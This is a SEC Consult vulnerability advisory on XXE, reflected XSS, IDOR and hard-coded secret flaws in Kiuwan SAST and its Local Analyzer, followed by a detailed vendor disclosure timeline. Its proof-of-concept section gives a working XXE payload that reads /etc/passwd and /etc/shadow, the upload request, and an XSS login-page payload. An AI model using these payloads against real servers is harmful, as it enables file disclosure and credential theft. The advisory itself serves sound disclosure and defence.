Kiuwan Local Analyzer / SAST / SaaS XML Injection / XSS / IDOR

`SEC Consult Vulnerability Lab Security Advisory < 20240606-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
product: Kiuwan SAST on-premise (KOP) & cloud/SaaS  
Kiuwan Local Analyzer (KLA)  
vulnerable version: Kiuwan SAST <2.8.2402.3  
Kiuwan Local Analyzer <master.1808.p685.q13371  
Kiuwan SaaS before 2024-02-05  
fixed version: Kiuwan SAST 2.8.2402.3  
Kiuwan Local Analyzer master.1808.p685.q13371  
Kiuwan SaaS after 2024-02-05  
CVE number: CVE-2023-49110, CVE-2023-49111, CVE-2023-49112  
CVE-2023-49113  
impact: critical  
homepage: https://www.kiuwan.com  
found: 2022-10-28  
by: C. Schwarz (Office Bochum)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Thorough code inspection is essential for designing secure software products.  
While your development team may not have time to comb through every line of code,  
Kiuwan does. For 20 years, it has been the choice of developers to scan code  
automatically and remediate defects according to security standards like OWASP,  
CWE, SANS, and CERT.  
  
Static application security testing (SAST) scans for security flaws in the source  
code without running the program. It is a white-box testing method that is the  
counterpart to dynamic application software testing (DAST), which tests web applications  
for run-time vulnerabilities. [...]  
  
Our code vulnerability scanning tools create an all-encompassing process that  
begins in the early stages of development and continues into production. Kiuwan’s  
static application security testing software fits perfectly into any DevOps environment.  
It uses a distributed engine and fast analysis to silently add security without  
causing a bottleneck in your workflows. [...]"  
  
Source: https://www.kiuwan.com/code-security-sast/  
  
  
Business recommendation:  
------------------------  
The vendor provides a patched version for Kiuwan On-Premise (master.1808.p685.q13371)  
which should be installed immediately.  
  
Although initially communicated otherwise during responsible disclosure in 2022-2023  
(see timeline below), the vendor confirmed in 2024 that the SaaS/cloud version is affected  
and will also be patched. The patch date was 2024-02-05, version 2.8.2402.3.  
  
An in-depth security analysis performed by security professionals is highly advised,  
to identify and resolve potential further critical security issues and to verify whether  
the developed patches really mitigate the identified critical security issues.  
  
SEC Consult also submitted further security issues to Kiuwan, such as Docker-related  
configuration issues which were also fixed during our responsible disclosure.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) XML External Entity Injection (CVE-2023-49110)  
When the Kiuwan Local Analyzer uploads the scan results to the web app (either  
on-premises or cloud/SaaS solution), the transmitted data consists of a ZIP  
archive containing several files, some of them in the XML file format.  
During Kiuwan's server-side processing of these XML files, it resolves external  
XML entities, resulting in a XML external entity injection attack.  
  
An attacker with privileges to scan source code within the "Code Security"  
module is able to extract any files of the operating system with the rights  
of the application server user and is potentially able to gain sensitive files,  
such as configuration and passwords. Furthermore, this vulnerability also  
allows an attacker to initiate connections to internal systems, e.g. for  
port scans or accessing other internal functions / applications such as the  
Wildfly admin console of Kiuwan.  
  
  
2) Services running as root  
The Kiuwan web app process is configured to run with root privileges. In case  
an attacker can compromise the application (such as documented in 1), this  
provides them with unrestricted access to the system.  
  
  
3) Reflected Cross-Site-Scripting (CVE-2023-49111)  
For Kiuwan installations with SSO (single sign-on) enabled, an unauthenticated  
reflected cross-site scripting attack can be performed on the login page. This  
is possible due to some request parameter values being directly included in a  
JavaScript block in the response. This is especially critical in business  
environments using AD SSO authentication, e.g. via ADFS, where attackers  
could potentially steal AD passwords.  
  
  
4) Insecure Direct Object Reference (CVE-2023-49112)  
Kiuwan provides an API endpoint to get information about any application,  
providing only its name. This endpoint lacks proper access control mechanisms,  
allowing other authenticated users to read information about applications, even  
though they have not been granted the necessary rights to do so.  
  
  
5) Sensitive Data Stored Insecurely (CVE-2023-49113)  
The Kiuwan Local Analyzer (KLA) Java application contains several hard-coded secrets in  
plain text format. In some cases, this can potentially compromise the confidentiality  
of the scan results.  
  
  
Proof of concept:  
-----------------  
1) XML External Entity Injection (CVE-2023-49110)  
The scan results of the Kiuwan Local Analyzer (KLA) are transmitted to the Kiuwan  
server (KOP on-premise or SaaS) using several XML files packed in a ZIP archive. Even  
though the initial upload only contains encrypted .bxml files, the server also parses  
regular XML files if they are present. A valid result archive with regular XML files  
can be obtained by clicking on the analysis code within the analysis log feature in  
the web GUI.  
  
[ screenshot xxe1.png ]  
  
Then, any XML file inside this archive can be weaponized with an XXE payload.  
The following snippet is taken from a manipulated metrics_python.xml file to  
exfiltrate the /etc/passwd file of the server:  
  
<?xml version='1.0' encoding='UTF-8'?>  
<!DOCTYPE replace [  
<!ENTITY xxe SYSTEM "file:///etc/passwd">  
]>  
<MetricReport technology='python'>  
<ConfidenceFactors>  
<GlobalConf>100.0</GlobalConf>  
</ConfidenceFactors>  
<ResumenGenerico>  
---[SNIP]---  
<high>100</high>  
<unit>%</unit>  
<category>documentation</category>  
</MetricDefinition>  
</MetricDefinitions>  
<Items>  
<Item id='0' type='system'>metrics: python</Item>  
<Item id='1' parent='0' type='program'>&xxe;</Item>  
<Item id='2' parent='0' type='program'>plugins/engines/smarty.py</Item>  
<Item id='3' parent='0' type='program'>plugins/legacy_engines/__init__.py</Item>  
---[SNIP]---  
  
After re-uploading the malicious archive, the server parses the XML files and  
triggers the XXE injection. The results of this particular payload can be  
found in the files tab of the code security module.  
  
[ screenshot xxe2.png ]  
  
The following PUT request can be used to upload the manipulated ZIP file  
(gathered from capturing the request between Kiuwan Local Analyzer and the server):  
-----------------------------------------------------------------------------  
PUT /saas/rest/v1/applications/analyses/report HTTP/1.1  
Content-Type: multipart/form-data; boundary=Boundary_1_215423993_1666774847780  
User-Agent: KiuwanLocalAnalyzer/master.1706.p646.q13222 (Java/11.0.16; Linux 5.19.0-kali2-amd64)  
Authorization: Basic [...]  
X-CSRF-TOKEN: b2a3a08e-3e24-4e43-98e1-870fa4b8279c  
X-KW-CORPORATE-DOMAIN-ID: <removed>  
MIME-Version: 1.0  
Host: KIUWAN_HOST  
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2  
Connection: close  
Content-Length: 48193  
  
--Boundary_1_215423993_1666774847780  
Content-Type: text/plain  
Content-Disposition: form-data; name="label"  
  
XXE test  
--Boundary_1_215423993_1666774847780  
Content-Type: text/plain  
Content-Disposition: form-data; name="start"  
  
2022-10-26T09:00:13Z  
--Boundary_1_215423993_1666774847780  
Content-Type: text/plain  
Content-Disposition: form-data; name="applicationId"  
  
123  
--Boundary_1_215423993_1666774847780  
Content-Type: text/plain  
Content-Disposition: form-data; name="qualityModelId"  
  
1  
--Boundary_1_215423993_1666774847780  
Content-Type: text/plain  
Content-Disposition: form-data; name="isDelivery"  
  
false  
--Boundary_1_215423993_1666774847780  
Content-Type: application/octet-stream  
Content-Disposition: form-data; filename="results.zip"; name="reports"  
  
PK [...removed XXE ZIP file contents...]  
--Boundary_1_215423993_1666774847780--  
-----------------------------------------------------------------------------  
  
[ screenshot xxe3.png ]  
  
2) Services running as root  
By abusing the XXE injection documented above to read the "/etc/shadow" file of  
the Kiuwan server, it is possible to retrieve its contents:  
  
root:locked::0:99999:7:::  
bin:*:17834:0:99999:7:::  
daemon:*:17834:0:99999:7:::  
adm:*:17834:0:99999:7:::  
lp:*:17834:0:99999:7:::  
sync:*:17834:0:99999:7:::  
shutdown:*:17834:0:99999:7:::  
halt:*:17834:0:99999:7:::  
mail:*:17834:0:99999:7:::  
operator:*:17834:0:99999:7:::  
games:*:17834:0:99999:7:::  
ftp:*:17834:0:99999:7:::  
nobody:*:17834:0:99999:7:::  
systemd-network:!!:17870::::::  
dbus:!!:17870::::::  
jboss:!!:17940::::::  
  
As only root can read this file, it can be concluded that the application server runs  
with root privileges. This could also be verified in the docker environment of  
Kiuwan on-premises.  
  
  
3) Reflected Cross-Site-Scripting (CVE-2023-49111)  
The XSS injection is possible on the login page of Kiuwan via the message parameter.  
To exploit the vulnerability, a victim must click on a link with the following  
payload:  
  
https://KIUWAN_HOST/saas/web/login.html?domain=XSS&message=x'%2Beval('alert(document.location)');//&sso=off  
  
The injected JavaScript code is only executed when the victim has a Kiuwan  
domain id cached in their web browser's localstorage (SSO-enabled users).  
  
[ screenshot xxs.png ]  
  
  
4) Insecure Direct Object Reference (CVE-2023-49112)  
By directly querying the following API endpoint, an authenticated user with  
standard privileges to access the "code security" module can query information  
about any other application, even though the permissions have not been assigned  
for those specific applications:  
  
https://KIUWAN_HOST/saas/rest/v1/info/application?application=APPLICATION_NAME  
  
  
5) Sensitive Data Stored Insecurely (CVE-2023-49113)  
Several credentials were found in the JAR files of the Kiuwan Local Analyzer.  
  
a) GitHub  
The JAR file "lib.engine/insight/optimyth-insight.jar" contains the file  
"InsightServicesConfig.properties", which has the configuration tokens  
"insight.github.user" as well as "insight.github.password" prefilled with  
credentials. At least the specified username corresponds to a valid GitHub  
account. SEC Consult did not test those credentials.  
  
b) Encryption Key  
The JAR file "lib.engine/insight/optimyth-insight.jar" also contains the file  
"es/als/security/Encryptor.properties", in which the key used for encrypting  
the results of any performed scan.  
  
  
Vulnerable / tested versions:  
-----------------------------  
All tests have been performed on Kiuwan on-premise Version 2.8.2110.2, as well  
as the respective Local Analyzer (KLA) version master.1706.p646.q13222.  
  
It was assumed that Kiuwan SaaS/cloud was also affected by the identified vulnerabilities  
during initial responsible disclosure.  
  
Originally, the vendor claimed that vulnerability 1) is not exploitable in the SaaS  
version as HTTPS certificates are being verified, nevertheless we provided the vendor  
with arguments why we still thought that it was exploitable, but because of lacking  
test environment this could not be confirmed on our side.  
  
In early 2024 the vendor confirmed that the SaaS version is affected and is also going  
to be patched.  
  
  
Vendor contact timeline:  
------------------------  
2022-11-08: Contacting vendor through established contacts, sharing detailed  
PDF vulnerability assessment report.  
2022-11-11: Sharing this security advisory information in addition.  
2022-11-16: Asking for a status update; response that findings were escalated  
internally and they are actively being reviewed.  
2022-11-23: Asking for a status update regarding patch availability and whether  
further information is needed.  
2022-11-23: Vendor: Analysis complete. Critical issues will be fixed before the end  
of CY23Q1. Lower risk issues will be evaluated for changes during CY23Q1  
with possible implementation during CY23Q2.  
2022-11-25: Telling the vendor that XSS should also be fixed earlier as the use of SSO  
bears an even higher risk of stealing enterprise AD credentials.  
2022-11-29: Vendor: the team are taking it into consideration.  
2023-05-09: Asking for a status update.  
2023-05-16: Vendor: the XSS issues will be fixed in the upcoming security update release,  
which is planned in the next two months.  
2023-05-17: Asking for a status update for all of the identified issues again.  
Informing vendor about next steps (requesting CVE numbers, etc).  
2023-05-31: Vendor response: "all critical issues are being addressed in the next security  
update project", they are furthermore adding more details on the specific  
issues:  
1) XXE - Vendor: affects KOP users more than cloud, as KLA verifies HTTPS  
certificate of the server and there is no way to download  
or modify the results as they are encrypted.  
Vendor quote: "Customers using the KOP installation should take standard  
measures to protect their private networks from external actors while  
Kiuwan develops a patch for this issue."  
Our answer: it is a local Java application and HTTPS checks can be bypassed.  
Encryption key is even stored in the local source code.  
2) Services as root - Vendor: "There is no common exploit for this issue."  
Our answer: yes, the XXE issue or any other code execution + file disclosure  
issue would be a problem; giving hints to least privileges and  
providing links to OWASP for further guidance.  
3) XSS - Vendor: only affects SSO-enabled clients. "In this case, standard  
security policies should be followed for the potentially insecure  
links sent to those users."  
Our answer: requesting info if this will be fixed or not and stating that  
SSO-enabled users have an even higher risk of stolen enterprise  
credentials.  
4) IDOR - Vendor: "only impacts users within the customer's private domain.  
It means that information is not leaked outside the customer's  
boundaries"  
Our answer: requesting further info what is meant by "private domain".  
No response to our question.  
5) Data leakage: "There is no common exploit for this issue."  
Our answer: Yes there is, the encryption key can be used to exploit the  
documented XXE issue.  
  
2023-06-02: Answering with very detailed statement (see our answers from above) on the why  
the security issues need to be fixed and when the "next security update  
project" is planned to release the patch.  
2023-06-13: Vendor proposes call to discuss open questions.  
2023-06-21: Conference call, clarifying next steps and that all issues are being worked on.  
2023-09-07: Asking for status update  
Vendor response: "development is complete, working through quality control.  
Update planned within the next month."  
2023-11-08: Asking for status update, affected/fixed version numbers and how customers  
will be informed.  
Vendor response: team made significant progress, final tests for general  
availability and release by end of November.  
2023-11-30: Update from vendor (compliance team): "we are still actively working on  
this update and project this to be ready by the end of December."  
2023-12-07: Expressing our concerns and dissatisfaction about the delay again.  
No response.  
2024-01-16: Asking once again about the patch status as no information was received and  
the vendor's communicated release date has passed again.  
Furthermore, asked about vendor communication to customers (security note),  
where customers can download the patch and changelog, and that we now plan  
to release the advisory latest within four weeks on 13th February 2024.  
2024-01-17: Vendor: escalated our email to product management, provided the following  
schedules for the resolution:  
23-Jan-2024 - Kiuwan Cloud (Kiuwan SaaS)  
31-Jan-2024 - Kiuwan on premise (KOP) release  
No answer regarding customer communication and changelog questions.  
2024-01-18: Vendor: confirms the dates again, no input regarding other questions.  
2024-01-19: Asking vendor again about version numbers, where to obtain the patch, whether  
all vulnerabilities will be fixed now including SaaS version. No response.  
2024-01-23: Communicated patch date for SaaS passed without patch being available nor  
any info from vendor.  
2024-01-31: Communicated patch date for KOP passed without patch being available nor  
any info from vendor.  
2024-02-05: Asking for a status update and answers to our questions again, assigning  
CVE numbers (CVE-2023-49110, CVE-2023-49111, CVE-2023-49112, CVE-2023-49113)  
and sending them to the vendor. Informing the vendor that we  
will proceed now to release our advisory on 13th February because they are  
non-responsive.  
2024-02-05: Vendor: did have delays, cloud security update is released today which fixes  
all identifies issues. KOP update will be scheduled after it goes through QE  
testing. Asking if we have further questions.  
2024-02-05: Asking about answers to our previous, still open questions again.  
1) Which version number for KOP is affected and which version will the patch  
have?  
2) How can a customer verify to have the patch installed?  
3) Whether and how/where will your customers be notified about the patch/  
security update?  
4) Where to obtain the patch?  
5) What is this changelog about https://www.kiuwan.com/docs/display/K5/Change+log  
It does not correlate to anything we see in our KOP installation.  
2024-02-05: Vendor: the cloud security update has been released today and is in production.  
2024-02-05: Vendor answers questions:  
Regarding KOP, several updates are combined with the security release, no ETA  
yet for KOP release, but no significant delay.  
1) version updates will come with the KOP release; currently improving  
versioning, changelogs will begin to contain version numbers.  
2) New baseline version numbers will be released and work forward from there.  
3) Release notes information will be included in the changelog. Informing  
customers will be discussed via Sales and Marketing.  
4) Answer about release notes and changelog which will be more robust and  
versioned. No info regarding where to obtain the patch.  
5) Correlation is being worked on and improved.  
2024-02-05: Offering to postpone the advisory release to end of February.  
2024-02-12: Vendor: still working an answers to our questions, release dates ready by  
"end of the week".  
2024-02-23: Asking for a status update as nearly two weeks have passed; no response.  
2024-03-04: Still no response from vendor, starting preparation of advisory release.  
Communicating release date for "early next week".  
2024-03-07: Vendor: Apologies for delay, cloud was patched on 6th February. Now  
finalizing release with updates for KOP customers. Already "in final  
stages of testing", release will be available "by end of April at the  
latest", asking to hold off publishing the advisory. Customers will be  
notified through support and/or sales with download link, customers  
can verify updated version by checking changelogs.  
2024-03-08: Asking if they mean "end of April" this year, extending once more.  
Expressing unsatisfactory process again, as Kiuwan already communicated  
back in September 2023 that the patch is ready.  
2024-03-11: Vendor confirms end of April this year, extra delay was needed to test  
the patch to meet quality standards for delivery.  
2024-04-25: Asking for a status update, so far no download link was provided.  
Wondering why cloud patches get prioritized although KOP users pay  
an additional premium for licensing.  
2024-04-29: Vendor: review for upcoming KOP release is finalized, product management  
team will contact us shortly.  
2024-05-03: Vendor: Kiuwan On Premise testing finishes by 6th May. If no issues found,  
KOP will be released in week of 13th May.  
2024-05-17: Vendor: Download link was planned for today, but technical team faced issues  
to provide a pre-release build for us. Provided changelog, but still no  
fixed version number. Vendor informs us that our reported security  
vulnerabilities were fixed.  
2024-05-21: Asking Kiuwan to confirm that our submitted security issues have really  
been fixed (mentioned in changelog from February 2024). Asking for a  
public download link (no pre-release build) and version number.  
2024-05-22: Vendor: passed information about five vulnerabilities to Kiuwan team  
for verification, but our five reported issues should be fixed.  
Version number not available before GA release.  
Targeting release for early next week.  
2024-06-01: Vendor informs us that a new KOP version was released, provides changelog  
and reference numbers, upgrade guide.  
2024-06-06: Coordinated release of security advisory.  
  
  
  
Solution:  
---------  
The vendor provides a patched version master.1808.p685.q13371 which should be installed  
immediately. See the changelog from the vendor:  
  
https://www.kiuwan.com/docs/display/K5/%5B2024-05-30%5D+Change+Log  
  
* XML External Entity Injection => CVE-2023-49110 is SAS-6851 fixed on release 2024-02-06  
* Services Running as Root => is SAS-6856 and SAS-6857 fixed on release 2024-05-15  
* Reflected Cross-site-scripting => CVE-2023-49111 is SAS-6852 fixed on release 2024-02-06  
* Insecure Direct Object Reference => CVE-2023-49112 is SAS-6853 fixed on release 2024-02-06  
* Sensitive Data Stored Insecurely => CVE-2023-49113 is SAS-6854, SAS-6855, SAS-6858, and SAS-6859 fixed on release 2024-02-06  
  
  
The following upgrade guide was provided by the vendor:  
https://www.kiuwan.com/docs/display/K5/Kiuwan+On-Premises+Distributed+Upgrade+Guide  
  
  
Although initially communicated otherwise during responsible disclosure in 2022-2023  
(see timeline above), the vendor confirmed in 2024 that the SaaS/cloud version is affected  
and will also be patched. The patch date was 2024-02-05, version 2.8.2402.3.  
  
SEC Consult also submitted further security issues to Kiuwan, such as Docker-related  
configuration issues which were also fixed during our responsible disclosure.  
* Sensitive Data Stored Insecurely for MySQL  
* Sensitive Data displayed for wildfly  
* Containers Running as root User  
* Containers running in the host network  
* Exposure of Internal Services  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Constantin Schwarz, Johannes Greil / @2024  
`